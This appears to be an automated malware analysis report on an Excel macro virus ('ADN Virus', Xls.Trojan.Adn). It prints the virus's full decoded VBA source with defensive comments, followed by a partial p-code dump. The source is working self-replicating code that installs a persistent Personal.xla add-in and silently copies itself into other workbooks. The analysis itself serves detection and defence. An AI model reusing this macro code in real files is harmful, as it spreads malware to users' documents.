Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fc45ea2c2222c321…

MALICIOUS

Office (OLE)

23.5 KB Created: 2000-12-06 20:55:44 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 67e61229b13b971942d890c77d37f3ee SHA-1: c21184ea9376f92543decda9caca0432903fb4fa SHA-256: fc45ea2c2222c3219ee9eeb7e01f889b53bab33488da91cbee7c4cc405557afa
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document containing VBA macros, including an Auto_Open macro — a common technique for executing code as soon as the document is opened. The script attempts to save a file named 'Personal.xla' to the application's path, likely to establish persistence: the extracted source copies its own macro module into that add-in and registers it as installed, and no routine for downloading further payloads is visible in it. The ClamAV detection further confirms its malicious nature.

Heuristics 3

  • ClamAV: Xls.Trojan.Adn-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Adn-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8424 bytes
SHA-256: 5a6ca30fb56986ec4818db1f92c140d2aa6a1b7eab0555c75d9958e05c9b419c
Detection
ClamAV: Xls.Trojan.Adn-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Workbook document module. The extracted source shows only export attributes
' here and no procedures; the macro code lives in the standard module "X316"
' further down (cf. the 965-byte stream size listed under "Module streams").

Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Worksheet module ("Hoja1" is the Spanish-locale default sheet name, i.e. Sheet1).
' Attributes only, no procedures in the extracted source. Note this name does NOT
' match the letter+digits pattern auto_open looks for (Val("oja1") is 0).

Attribute VB_Name = "X316"
' Spalaci Label is Pac
' ADN Virus - (C) Copyright 1999/2000
' Standard module that carries the virus body (the "ADN" self-identification above
' matches the ClamAV family name Xls.Trojan.Adn). The module name — one letter
' followed by digits — is the naming pattern auto_open searches for:
' "X" & Val("316") = "X316". Copies get a fresh random name of the same shape.
' Module-level state: name of the virus module, set by auto_open and read by
' ClassModulo. The module has no Option Explicit; all other variables are
' implicit Variants.
Public Indexe As String

Private Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
' Runs automatically when the workbook is opened (the OLE_VBA_AUTO finding).
' Purpose: find the module carrying the virus and remember its name in the
' module-level variable Indexe for ClassModulo to use later.
' Enumerating ThisWorkbook.VBProject.VBComponents requires programmatic access
' to the VBA project; on modern Office this is blocked unless "Trust access to
' the VBA project object model" is enabled, so that setting is a worthwhile
' hardening check against this whole family.
For i = 1 To ThisWorkbook.VBProject.VBComponents.Count
    Cadena = ThisWorkbook.VBProject.VBComponents(i).Name
    ' Split the component name into its first character and the remainder.
    Letras = Left(Cadena, 1): Numero = Right(Cadena, (Len(Cadena) - 1))
    ' Rebuild the name as <first char> & Val(<remainder>). The comparison below
    ' only holds when the remainder is purely numeric, e.g. "X316" -> "X" & 316;
    ' "ThisWorkbook" and "Hoja1" rebuild as "T0" and "H0" and are skipped.
    Fusion = (Letras & Val(Numero))
    If Cadena = Fusion Then
       ' Matched the virus's own naming convention (see module "X316").
       Indexe = ThisWorkbook.VBProject.VBComponents(i).Name
    End If
Next
' Hook ClassModulo to fire on every sheet activation: the spreading and
' persistence work is deferred from open-time to ordinary user interaction.
Application.OnSheetActivate = "ClassModulo"
End Sub

Private Sub ClassModulo()
Attribute ClassModulo.VB_ProcData.VB_Invoke_Func = " \n14"
' Spreading / persistence routine, invoked through Application.OnSheetActivate
' (registered in auto_open). Relies on Indexe already holding the virus module name.
    Randomize: install = 0
    ' Suppress prompts (e.g. SaveAs overwrite confirmations) and screen redraws so
    ' the file writes below produce no visible feedback for the user.
    Application.DisplayAlerts = False
    Application.ScreenUpdating = False
    ' Build a random module name: one uppercase letter (ASCII 65-90) followed by a
    ' number 1-1000, e.g. "Q417" (constructed example). Each copy therefore gets a
    ' fresh name, which is why auto_open matches on the letter+digits pattern
    ' rather than on a fixed module name.
    Intr = Int((Rnd * 1000) + 1)
    Iltr = Int((90 - 65 + 1) * Rnd + 65)
    Play = (Chr(Iltr) & Intr)
    If ThisWorkbook.Name <> "Personal.xla" Then
       ' Branch 1: running from an infected ordinary workbook. Persist by creating
       ' an add-in in the Excel program directory (Application.Path), unless a
       ' file of that name is already there.
       If Dir(Application.Path + "\Personal.xla") = "Personal.xla" Then install = 1
       If install = 0 Then
          Workbooks.Add.SaveAs FileName:=Application.Path + "\Personal.xla"
          ' Export writes the module to a file named after the component; no path
          ' is given, so it presumably lands in the current directory — a disk
          ' artifact worth looking for alongside Personal.xla during response.
          ThisWorkbook.VBProject.VBComponents(Indexe).Export (Indexe)
          Workbooks("Personal.xla").VBProject.VBComponents.Import (Indexe)
          Workbooks("Personal.xla").VBProject.VBComponents(Indexe).Name = Play
          Workbooks("Personal.xla").IsAddin = True
          Workbooks("Personal.xla").Save
          ' Registering the add-in as Installed makes Excel load it on every start:
          ' this is the persistence mechanism referred to in the summary above.
          AddIns.Add(Application.Path + "\Personal.xla").Installed = True
       End If
    Else
       ' Branch 2: running from the installed add-in. Infect the workbook the user
       ' is working in, unless it already carries a letter+digits module.
       For i = 1 To ActiveWorkbook.VBProject.VBComponents.Count
           Cadena = ActiveWorkbook.VBProject.VBComponents(i).Name
           Letras = Left(Cadena, 1): Numero = Right(Cadena, (Len(Cadena) - 1))
           Fusion = (Letras & Val(Numero))
           If Cadena = Fusion Then install = 1
       Next
       If install = 0 Then
          ThisWorkbook.VBProject.VBComponents(Indexe).Export (Indexe)
          ActiveWorkbook.VBProject.VBComponents.Import (Indexe)
          ActiveWorkbook.VBProject.VBComponents(Indexe).Name = Play
       End If
    End If
    ' Low-impact trigger: when a random day number (1-31) happens to equal today's
    ' day of month, change the Excel title bar and enlarge toolbar buttons.
    ' The caption string is a usable indicator of an active infection.
    If Day(Now()) = Int((31 * Rnd) + 1) Then
       Application.Caption = "Spalaci.Label.Is.Pac"
       Application.CommandBars.LargeButtons = True
    End If
    Application.DisplayAlerts = True
    Application.ScreenUpdating = True
End Sub


' Processing file: /opt/analyzer/scan_staging/a0c02223c71b4b69825cf655ae9cfabb.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 965 bytes
' _VBA_PROJECT_CUR/VBA/Hoja1 - 956 bytes
' _VBA_PROJECT_CUR/VBA/X316 - 3847 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0015 " Spalaci Label is Pac"
' Line #1:
' 	QuoteRem 0x0000 0x0024 " ADN Virus - (C) Copyright 1999/2000"
' Line #2:
' 	Dim (Public) 
' 	VarDefn Indexe (As String)
' Line #3:
' Line #4:
' 	FuncDefn (Private Sub auto_open())
' Line #5:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #6:
' 	Ld i 
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	St Cadena 
' Line #7:
' 	Ld Cadena 
' 	LitDI2 0x0001 
' 	ArgsLd LBound 0x0002 
' 	St Letras 
' 	BoS 0x0000 
' 	Ld Cadena 
' 	Ld Cadena 
' 	FnLen 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	ArgsLd Right 0x0002 
' 	St Numero 
' Line #8:
' 	Ld Letras 
' 	Ld Numero 
' 	ArgsLd Val 0x0001 
' 	Concat 
' 	Paren 
' 	St Fusion 
' Line #9:
' 	Ld Cadena 
' 	
... (truncated)